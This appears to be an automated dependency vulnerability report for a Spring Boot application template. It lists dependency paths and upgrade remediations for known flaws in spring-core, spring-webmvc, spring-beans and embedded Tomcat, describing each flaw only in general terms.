  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20

Overview

org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.

Affected versions of this package are vulnerable to Incorrect Authorization via the AnnotationsScanner and AnnotatedMethod class. An attacker can gain unauthorized access to sensitive information by exploiting improper resolution of annotations on methods within type hierarchies that use parameterized supertypes with unbounded generics.

Note: This is only exploitable if security annotations are used on methods in generic superclasses or generic interfaces and the @EnableMethodSecurity feature is enabled.

Remediation

Upgrade org.springframework:spring-core to version 6.2.11 or higher.

References

high severity

Path Traversal

  • Vulnerable module: org.springframework:spring-webmvc
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.10.

Overview

org.springframework:spring-webmvc is a package that provides Model-View-Controller (MVC) architecture and ready components that can be used to develop flexible and loosely coupled web applications.

Affected versions of this package are vulnerable to Path Traversal via the WebMvc.fn and WebFlux.fn frameworks. An attacker can access any file on the file system that is also accessible to the process in which the Spring application is running by crafting malicious HTTP requests.

Note:

This is only exploitable if the web application uses RouterFunctions to serve static resources and resource handling is explicitly configured with a FileSystemResource location.

Workaround

This vulnerability can be mitigated by using the Spring Security HTTP Firewall or running the application on Tomcat or Jetty.

Remediation

Upgrade org.springframework:spring-webmvc to version 6.1.13 or higher.

References

high severity

Path Traversal

  • Vulnerable module: org.springframework:spring-webmvc
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.

Overview

org.springframework:spring-webmvc is a package that provides Model-View-Controller (MVC) architecture and ready components that can be used to develop flexible and loosely coupled web applications.

Affected versions of this package are vulnerable to Path Traversal through the functional web frameworks WebMvc.fn or WebFlux.fn. An attacker can craft malicious HTTP requests and obtain any file on the file system that is also accessible.

Note: This is similar to CVE-2024-38816, but with different input.

Remediation

Upgrade org.springframework:spring-webmvc to version 6.1.14 or higher.

References

high severity

Improper Input Validation

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.18.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.18.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Improper Input Validation due to the improper parsing of HTTP trailer headers. An attacker can manipulate the server into treating a single request as multiple requests by sending a trailer header that exceeds the header size limit. This could lead to request smuggling when the server is behind a reverse proxy.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.96, 9.0.83, 10.1.16, 11.0.0-M10 or higher.

References

high severity

Relative Path Traversal

  • Vulnerable module: org.springframework:spring-beans
  • Introduced through: org.springframework.data:spring-data-commons@4.0.0-M6, org.springframework.hateoas:spring-hateoas@1.5.1 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.data:spring-data-commons@4.0.0-M6 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-web@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-web@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
